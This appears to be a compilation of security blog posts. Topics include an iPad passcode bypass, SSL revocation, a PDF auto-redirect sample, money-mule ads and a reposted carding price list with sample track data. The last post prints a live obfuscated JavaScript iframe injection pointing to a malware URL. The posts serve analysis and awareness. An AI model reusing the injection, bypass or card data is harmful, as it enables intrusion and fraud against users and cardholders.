iPad II security vulnerability – bypass lock code of iPad using smart cover.. With solution

Ok so we got the cool looking iPad smart cover and it has an feature that allows the iPad to get locked when the cover is on.

If you have set a numerical password for your iPad using settings > general > pass codes on


iPad cover lock is also set to on


Your iPad with latest IOS 5 is vulnerable with a lock code bypass vulnerability

Here is how to reproduce this vulnerability

1. Lock your iPad either using power button, keeping it idle, closing the smart cover etc.
2. Keep the power button pressed till slide to power off screen appears
3. At this screen close your smart cover
4. Open your smart cover and click cancel

🙂 you are in … Without having to enter the code..

.. Wait for a formal patch from Apple..

Well guys… Just got an update from Saumil .. You can not do any changes to apps but you can still view unlocked screen…

Once you press home button you would be returned to the locked screen again..

Still discloses where you locked your iPad..

Thanks to Saumil http:\saumil.net

.. Oct 24 2011 ..

You could iPad smart cover lock unlock to off at settings and the vulnerability will be ineffective..

SSL certificates CRL weakness and alternatives

Recently COMODO, a trusted root authority faced a hack that allowed an attacker to issue fake SSL certificates. Fake certificates in the name of Gmail, Skype, Mozilla, Yahoo were issued. COMODO confirmed of the breach at one of their reseller where the RA was breached and issued CRL (Certificate Revocation Lists) that inform users of the fake certificates having been revoked.


Certificate Revocation Lists are a list of certificates published by an RA at a periodic interval. The CRLs are updated by most new browsers at the time of boot. CRLs are a point in time representation of the revoked certificates and do not check the certificate status in real time.

There are a number of initiatives available that attempt to overcome this issue with CRLS.

Google Certificate Catalog

Google’s crawlers scan the web on a regular basis to provide search services. In the process the Google robots maintain a record of all SSL certificates seen. The record is a SHA-1 hash of the certificate represented as a hex number.

Google requires the site to satisfy the following criterion before the certificate can be included.

1. It must be signed by a valid CA

2. It must bear the correct domain name. (i.e. the domain from which the cert was taken should match the name on certificate.)

One can look up a TXT record for the certs.googlednstest.com domain using the hash created as above. The DNS shall return three records.

1. Day the certificate was first seen by Google.

2. Most recent day that the certificate was seen by Google.

3. Number of days Google saw the certificate in-between.

In an event where one comes across a certificate that is signed but Google holds no hash for this certificate, one may stand suspicious.

Google is attempting to build automated query validation support for CHROME.


DANE (DNS based Authentication of Named Entities) is an initiative of Internet Engineering Task Force (IETF). The idea is to allow DNS to publish information about SSL certificates used on their hosts, Publish valid certificates or CA’s that are allowed to sign certificates for the hosts.

So if one comes across a certificate that is not consistent with the information published by DNS then he should be suspicious.

Since this relies on DNS only it is not secure. (Uses UDP for queries, not encrypted etc)


DNSSEC tries to overcome above problem by publishing the records in an encrypted / signed manner to protect confidentiality / integrity.


OCSP (Online Certificate Status Protocol) tries to query the servers to retrieve the real-time status of the certificate.

Under OSCP, issued certificates carry an OCSP “authority identifier” field. Certificate applications use OCSP “requestor” software to request status from an OCSP “responder.”

A browser (requester) can query a responder (a Server at CA, specified at the browser as ‘authority identifier’) to obtain information about validity of a certificate in real-time.

DV, OV and EV certificates.

The newer versions of the SSL certificates tries to control the issue at the issuance level.

Most certificates seen at the market are economical DV (Domain Validated) certificates. These only certify that the applicant had control over domain name at issue.

OV (Organization Validated) certificates require companies to submit additional documentation at the issuance and certify the owner company holding the domain.

EV (Extended Validation) certificates follow a more stringent criterion at issuance. The newer browsers will show a green URL bar that displays certificate name and issuer.

Fraudulently issued certificates can be used to create authentic looking phishing sites / browser plug-ins that can lead a user to believe that the site/plug-in is authentic. This poses a big risk and the countermeasures discussed earlier can address the risk to a great extent.

File based malware analysis – pdf files – part1

pdf has become the preferred format for document exchange and is considered more secure(?) than its MS counterparts.

with the release of new capability to include scripting (though limited) has been useful for creating dynamic pdf files, the same functionality is being used by malware authors.

with a few lines of code it is very easy to include pdf files to hold a code for redirecting to any other site.

I was not sure if it would make sense to include any other readily available ‘malicious’ file here so I wrote a file myself.

the file may be downloaded and it is safe..

I am including the hashes for one to compare

MD5 : 1a4da40cdeac17ad239250e392a86141
SHA1 : ba5cf3d59ce605ca774d5b5e02963623b1f902da
SHA256: f3d7fe83af30001ec6d6d88c4fc2a43ad7bd7b8cc93466e80e78fe8418fe90f1

and the file itself..for you to download and try..

Download PDF redirection example

now this file comes out clean through virus total..

Antivirus Version Last Update Result
AhnLab-V3 2010.10.09.00 2010.10.08 –
AntiVir 2010.10.08 –
Antiy-AVL 2010.10.09 –
Authentium 2010.10.09 –
Avast 4.8.1351.0 2010.10.09 –
Avast5 5.0.594.0 2010.10.09 –
AVG 2010.10.08 –
BitDefender 7.2 2010.10.09 –
CAT-QuickHeal 11.00 2010.10.08 –
ClamAV 2010.10.09 –
Comodo 6325 2010.10.09 –
DrWeb 2010.10.09 –
Emsisoft 2010.10.09 –
eSafe 2010.10.07 –
eTrust-Vet 36.1.7901 2010.10.08 –
F-Prot 2010.10.08 –
F-Secure 9.0.15370.0 2010.10.09 –
Fortinet 2010.10.08 –
GData 21 2010.10.09 –
Ikarus T3. 2010.10.09 –
Jiangmin 13.0.900 2010.10.09 –
K7AntiVirus 9.65.2707 2010.10.08 –
Kaspersky 2010.10.09 –
McAfee 5.400.0.1158 2010.10.09 –
McAfee-GW-Edition 2010.1C 2010.10.08 –
Microsoft 1.6201 2010.10.08 –
NOD32 5516 2010.10.08 –
Norman 6.06.07 2010.10.09 –
nProtect 2010-10-08.01 2010.10.08 –
Panda 2010.10.08 –
PCTools 2010.10.09 –
Prevx 3.0 2010.10.09 –
Rising 2010.10.09 –
Sophos 4.58.0 2010.10.09 –
Sunbelt 7021 2010.10.09 –
SUPERAntiSpyware 2010.10.09 –
Symantec 20101.2.0.161 2010.10.09 –
TheHacker 2010.10.08 –
TrendMicro 2010.10.08 –
TrendMicro-HouseCall 2010.10.09 –
VBA32 2010.10.08 –
ViRobot 2010.9.25.4060 2010.10.09 –
VirusBuster 2010.10.08 –

the file tries to redirect a user to this very site i.e. tusharvartak.com.

the file may be analysed with a simple text viewer and the code looks like this..

—–pdf code—–

7 0 obj
<< /Type /Font /Subtype /Type1 /Name /F1 /BaseFont /Helvetica /Encoding /MacRomanEncoding >>

6 0 obj
[/PDF /Text]

5 0 obj
<< /Length 46 >>
/F1 10 Tf
100 700 Td
(Test redirection)Tj

4 0 obj
<< /Type /Page /Parent 3 0 R /MediaBox [0 0 612 792] /Contents 5 0 R /Resources << /ProcSet 6 0 R /Font << /F1 7 0 R >>

3 0 obj
<< /Type /Pages /Kids [4 0 R] /Count 1 >>

2 0 obj
<< /Type /Outlines /Count 0 >>

1 0 obj
<< /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 8 0 R >>

8 0 obj
<< /Type /Action /S /URI /URI (h ttp://tusharvartak.com) >>

0 9
0000000000 65535 f
0000000565 00000 n
0000000509 00000 n
0000000440 00000 n
0000000273 00000 n
0000000169 00000 n
0000000136 00000 n
0000000012 00000 n
0000000662 00000 n
<< /Size 9 /Root 1 0 R >>

—–pdf code—–

cakewalk huh..

here’s the interesting code..

8 0 obj
<< /Type /Action /S /URI /URI (h ttp://tusharvartak.com) >>

the bulky pdf reference from adobe tells us that URI is to resolve a URL..

since pdfs (the unencrypted ones..) hold these actions mostly as text strings it is possible for a URL filtering solution to detect the redirection to a malicious url..

it is further possible to obfuscate the URL contained and will post the same soon ..

It is interesting to see that if you download the pdf file referred above and open it with acrobat reader, it will ask whether the user wants to navigate to a site and allows one to block the same.

Download PDF redirection example

now try clicking the link with a browser that is capable of displaying pdf files using a add-in (this would mean almost all browsers in use today)

The file will open in browser and will redirect user to tusharvartak.com

Money mules recruitment drive – fraudsters recruiting people online

fraudsters are looking for FREELANCE MONEY MULES !

Eligibility criterion – just one online bank account..

most of us reading this post would already know about Money Mules.. for those who don’t reproducing the def’n from wikipedia..


A money mule is a person who transfers stolen money or merchandise from one country to another, either in person, through a courier service, or electronically. The term is commonly used to describe on-line scams that prey on victims who are unaware that the money or merchandise they are transferring is stolen. In these scams, the stolen money or merchandise is transferred from the victim’s country to the scam operator’s country.

Online money mule scams typically exist as a result of other types of online fraud, such as phishing scams, malware scams or scams that operate around auction sites like eBay. After money or merchandise has been stolen using any of those methods, a scammer will employ a mule to relay the money or goods to the scammer. This process obscures the scammer’s true identity and location from the initial victim. Money mules may be subject to criminal prosecution for their actions.

Money mules are commonly recruited with job advertisements for “payment processing agents,” “money transfer agents,” “local processors,” and other similar titles. Some money mules are recruited by a scammer posing as an attractive member of the opposite sex. Candidates are asked to accept payments and to remit most of the funds to a third party — a job which can be done from one’s own home. Legitimate companies use escrow services for this kind of work. Scammers trading in stolen goods use similar tactics to recruit mules who receive packages and then forward them to mail drops in the scammer’s home country.


the platform chosen this time is online freelancing site.. the fraud participation is offered assured orders if things go well…

I need somebody who can make online bank accounts.

I need these accounts to be with banks that have online banking. They can be in any country in the world. I will supply Name & Addresses & email address.

I don’t require or want any overdraft or any credit/debit card. Just a very simple online bank account.

At first I will just need 1 online bank account. However if everything works well then you can be assured of regular orders.

If anything is unclear or you have questions, please leave me a message on the project message board.

Paypal appears to be preferred method for money transfer.. here’s another one who offers $20

I need help from anyone. I will paypal $20 instantly to anyone for the following information. If you already own a bank account with some bank, if the bank allow you to open a new account online with easy, instantly, without any hassles or visiting bank in person…

Good Morning..

Underground economy 3 – Phoenix exploit kit fake antivirus and live C&C server

after Mpack there has been a set of exploit kits that were released targeting pdf vulnerabilities. Some of the recent ones are Crimepack and Phoenix.

Here is a live command and control center for phoenix located at


(please be careful with this url, recommended precautions include a virtual machine that you are willing to sacrifice)

the urls that will get into the iframe injections are


this is a trojan dropper, most updated AV’s will detect this as a Fake AV variant. Phoenix uses multiple fake antivirus softwares to distribute. from nano versions to pro till defenders we got it all !

second url that gets into an iframe injection as shown in the first post De-obfuscating javascript for malware analysis is


again this is LIVE and carrying a powerful set of exploits so please have a virtual machine handy for the analysis.The malware targets most of the recent vulnerabilities discovered with adobe reader, internet explorer, adobe flash player, and java

could get the actual exploit pack consisting of two js, two html, one flash and one asm file…

tryin to get the password for the zip file .. as soon as I get the files opened will post more analysis..


Underground economy 2 – try before you buy, track1 and track2 data

here is a Russian blog offering the track1 and track2 data for test drive.. wonder if this can be validated without fabricating on the card itself?

a Google translated version follows..


MA laws regarding MY MENU .. Вы CALLL за то, что потребность с IMEDIETE ЭФФЕКТ в отношениях .. You CALLL for what needs to IMEDIETE effect on .. Я DONT рыхлители здесь нужно STAY OFF .. I DONT rippers here to STAY OFF .. Я не дашь испытать вас ПОКУПАТЬ .. I will not let you into buying experience .. Я СОГЛАСЕН LibertyReserve …. I AGREE LibertyReserve …. WESTERN UNION. WESTERN UNION. .. .. ДЕНЬГИ WEB .. MONEY WEB .. М., компетентных в МОЙ БИЗНЕС .. M. competent in MY BUSINESS .. ALL MY ПУНКТ ARE в базе данных. ALL MY ITEM ARE in the database.

Ответить с цитатой ВСЕ, ЧТО ВЫ NEED.THANK Вас за выбор нашего сервиса. Reply with quote EVERYTHING YOU NEED.THANK you for choosing our service.

Банковские переводы. Bank transfers.
Свалок. Landfills.
Скиммеры. Skimmers.
CVV FULL + информация. CVV FULL + information.

образца трек 1 и 2 нам sample track 1 and 2, we
>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>

Track2: 4124877000619142 = 11052011451475400000 Track2: 4124877000619142 = 11052011451475400000

Track2: 4548036252470062 = 13101010000097900685 Track2: 4548036252470062 = 13101010000097900685

4151700282453129 = 10051011406543400000 4151700282453129 = 10051011406543400000

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


Всегда свежие и тестирование перед проданы. Always fresh and tested before sold.


Underground economy – CC numbers, Mag Strip info, CVV on sale

A real world, recent post on underground economy offering sale of credit card numbers, cvv etc..

stumbled across an underground posting offering sale of

  • Freshly skimmed cards
  • cvv2
  • ATM pin numbers
  • spamming service
  • phishing page development
  • credit card writer (could get a pic from net)

  • and a lot of bank data up for sale

please find below the version..


and the text version


I’m Sell freshly skimmed not hacked or generated, all Dumps are tested before sale. all dumps with original track1 and 2 Freshly ccv,paypal,mailer,leads,bank login,smtp,rdp Skimmed with camera and dial pad 100% working. No resales or fakes. NO RIPPERS CO


Mailers,C-Panel,SMTP,email leads etc!!!

Sell CVV2 Fresh

CVV From All Country In World Is Available.
and You Can ask For Special Bin.
We Search In Our Big Db.

CVV Selling Option :
We Checked Cvv B4 Sell You.
We Replace Dead Cvv In 48 Hurs.

Price List :
Usa ccv Visa : 3$
Usa ccv Master : 3$
Usa ccv Amex : 6$
Usa ccv Discover : 6$
Usa ccv With D.o.B : 12$
Usa ccv Fullz : 25$
Usa ccv With Full Infos : 30$

Uk ccv Visa : 5$
Uk ccv Master : 5$
Uk ccv Discover : 8$
Uk ccv With D.o.B : 15$
Uk ccv Fullz : 25$
Uk ccv With Full Info : 35$

Germany ccv Visa : 10$
Germany ccv Master : 10$
Germany ccv With D.o.B : 15$
Germany ccv Fullz 30$
Germany ccv With Full Info : 40$

Italy ccv Visa : 10$
Italy ccv Master : 10$
Italy Ccv With D.o.B : 15$
Italy ccv Fullz : 25$
Italy ccv With Full Info : 30$

Etc For More Price Of Ccv’s……….
Price List Of Dumps……
Price for dumps With ATM PIN and Good Balance :

Usa Dumps Classic : 25$
Usa Dumps Platinum : 50$
Usa Dumps Gold : 50$
Usa Dumps Corporate : 70$

Uk Dumps Classic : 30$
Uk Dumps Platinum : 50$
Uk Dumps Gold : 55$
Uk Dumps Corporate : 60$

Italy Dumps Classic : 40$
Italy Dumps Platinum : 70$
Italy Dumps Gold : 100$
Italy Dumps Corporate : 120$

Europe Dumps Classic : 100$
Europe Dumps Platinum : 150$
Europe Dumps Gold : 150$
Europe Dumps Corporate : 200$

Other countries:
MasterCard| Visa Classic – 40$
Visa Gold|Platinum|Corporate|Signature|Business – 80$

Etc For More Price Over Dumps……..

Maillist / Mailers / Cpanel ( $10 – $30 )

Transfers :
WU Transfer – 10% upfront of whatever amount you want us to transfer for you
eg: if you want $1000 you will have to pay $100 upfront.

We make Wire transfer and cheque transfer to
UK and US banks .. HSBC // Nationwide //Halifax //Abbey // Capital // BOA // watchovia //
Barclays // FCU / Regions / Wells // etc..

Cost is 10% upfront of whatever amount you want us to transfer for you ( will accept an offer depending on the amount to be transfered )

Fulls come with this info
Firstname, Lastname, Address, City, State, Zipcode, Phone, SSN, Mother’sMaidenName, DOB,
Driver’s License # and state, Email pass , Verifiedbyvisa pass, Cardnumber, Expiry Date, CVV2,
Employment, Position Held
Bank pass, number, name, account number and Routing Number and other infoz.
cc fullz info us = $25
cc full info uk & eu & asia = $40

We Have Shopadmin, cc in this shopadmin have full info

Shipping Service :
We Have Good and Safe Service For Ship Product To Your Address.
Our Service Is Very Fast and Without Delay.
You Can Select Your Item In Shopping and Give link .
We buy your Product For You and send To Your Address.
We Can Ship All Item TO WorldWide Ship Address.
Our Service Is Very Cheap.

We Can Ship Laptop and Iphone And All Electronic Item To Your SHipping Address.

spamming Service :

We Have Good stuff For Spamming.
If You are Spammer. We Have Good And Work Stuff for You.

Inbox Mailer :
Web Mailer and Good Mailer Software Is Available for You.
We Have Good Php and Ajax Web Mailer For You.
And We Have Good Software For Spamming For All Spammer.

Mail List And Lead :
We Have Fresh And Active And New Mail List And Lead For You.
All Mail List And Lead Is From Bank Member or Shopping User.
and Our Price for Spamming Stuff Is cheap.
and mail list from all country is available.

Cpanel and Hosting and Shell:
Cpanel with dedicated Ip And big space And High Speed For Spamming is Available For You.
and good hosting panel is Available for you. this is very good offer for spamming.

yes we have good shell for you.
we have php and asp shell for sale.
this is special offer for spamming.

Remote Desktop (RDP) :
We Have High Speed And Bandwith For Spamming.
with windows server 2003 and with windows server 2008.
and all server have big hard space.
very good offer for big download and big upload from this.

We Have Good SMTP For All Big Spammer.
With Good Ip . and high speed.

Mail Sender And Mail Spider :
Email Spider Gold . to Auto Haverst emails from the internet “Websites , and forums”
Advanced Mass Sender ( This Best Program To spam email useing SMTP where u will get them using Smtp scanner “Hscan”)

Bank Login :
Bank Login From Usa And Eu And Uk And Asia Is Avaiable.

Scotia OnLine
Bremer Online Banking
Flagstar Bank
KBC Bank
Credit Union
American Express
Wells Fargo
Pen Air Federal
U.S. Bank
First Trust Bank
Banque Nationale

And We Have Good Service For Bank Transfering For You .
And Our Service Is Very Fast And Safe And immediate .

Good Logins :

Trebuchet MS We Have Good And Fresh And Work Login For Yu.

Paypal Login :
We Have Verified And Unlimited Paypal Account With Balance And Add Cc And BAnk Accunt.
All Our PayPa Acc Have Full Info And With Email Access and With All Security Answer . And With Orginal Ip And A Program For Fake Your System Ip To Orgina Ip For Full Access To PayPal Acc.

Ebay Login :
Fresh And Verified And Unlimited Ebay Account.
With Ful Info And Full Access.

MoneyBookers Account :
Verified And Full Access MoneyBookers Account.
Verified With Good Balance.
From All Country.
With Add Verified Cvv And Bank Acc.
With Orginal Ip And With All Security Answer.

ClickAndBuy And Alertpay Account Is Available ….

Merchand Account :

I can make fake ecommerce sites that can help you get approved for MERCHANT ACCOUNTS. And any other type of scam websites. Just tell me what the scheme is like and I help you develop it.
Website design, html/php/flash animations etc. To create fake company websites, fake shopping carts, sites to sell you drugs, skimmers, dumps, cc and other items, bogus bank sites etc.
What you do with your websites is your responsibility. I’ve been in the scene for a very long time vending the same products.

Dump Writer and Reader Machine

MSR206 Reader/Writer USB

Magnetic Swipe Card Reader/Writer MSR206 is designed to offer a card reading/writing solution for ISO 7811/1~6 formats. It reads and writes up to 3 tracks of data, e.g. decoding/encoding and verifying up to 3 tracks of data simultaneously. Also, MSR206 Reader/Writer provides a standard RS-232 interface to communicate with host system or other terminal computers. That will attractively complement an existing system.


* Reading/Writing magnetic stripe card complied with ISO 7811/1~6 formats
* Read/Write High & Low Coercive force of magnetic stripe (300~4000Oe)
* High/Low Coercivity encoding circuitry selectable on screen
* Program software for Windows 98/Me/XP
* Programming software for various read/write performance
* Programmable leading bit, raw data, DMV/AAMVA, and user defined forma
* Manual Swipe to read and/or write card with RS-232 output
* Writing and verifying data on single, dual, or triple track in one swipe
* 5~35ips operational swipe speed of writing data
* 5~55ips operational swipe speed of reading data
* +24VDC+/-10%, 2.0A Max., external power adapter attached
* Good size with dimensions of 210(L) x 60(W) x 65(H) mm
* CE, FCC, UL, cUL certified

Price : 200$
With Free Shipping.

Payment Accepted Is Liberty Reserve(LR) , Web Money Zone (WMZ) And Western Union (WU) That All Payment Accepted…..


will post more as I harvest it..

as a tail..check the post about UE try before buy options..


De-obfuscating javascript for malware analysis

I came across a live malware injection in a website website..thought i’d post the details. this one was easy to de-obfuscate as it was only single level of javascript obfuscation.

have a look at the seemingly innocuous contact us page. At the time of this analysis the site carrying malware was not serving any payload.. be careful if you decide to navigate to this page.. the site may be serving payloads..

the interesting obfuscated javascript can be seen near the end of page sourcecode..

let’s have a look at the script below..

we can see

  1. the two variables k1 and k2 assigned with a value..
  2. t1 and t2 initialised as counters for the while loops ahead
  3. a simple unicode encoding using the fromcharcode method and a rotational cipher by simple increment.
  4. a document.write to output the resultant string for calling the malware-laden url

we have couple of options here

  1. work backwords to de-obfuscate the javascript
  2. try to catch resultant string.. this definitely sounds smarter and easier

so we change the document.write(h) to another useful javascript function alert(). We save the page as a .html to desktop and change the html code to reflect the changed function.

note we need the ‘webpage complete option’ so as to ensure the referenced scripts, css etc are saved.

we make the change

now run the html page using the browser and bingo !

We have the secret iframe injection.. please note this

  1. DIV visibility is set to hidden, framborder, hspace and vspace is set to zero
  2. the hidden iframe loads a page from the rusian url http://beefezzazbzfc.users.iframecounter.ru/?s=1

Hope this was useful.. will try to post some other advanced malware analysis..

var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22',k2='0wugtu0khtcogeqwpvgt0tw1Au?3$"htcogdqtfgt?2"xurceg?2"jurceg?2"ykfvj?3"jgkijv?3"octikpykfvj?2"octikpjgkijv?2"uetqnnkpi?pq@>1khtcog@>1fkx@',t1=0,t2=0,h='';while(t1<=k1.length-1){h=h+String.fromCharCode(k1.charCodeAt(t1++)-3);}h=h+'beefezzazbzfc';while(t2<=k2.length-1){h=h+String.fromCharCode(k2.charCodeAt(t2++)-2);}document.write(h)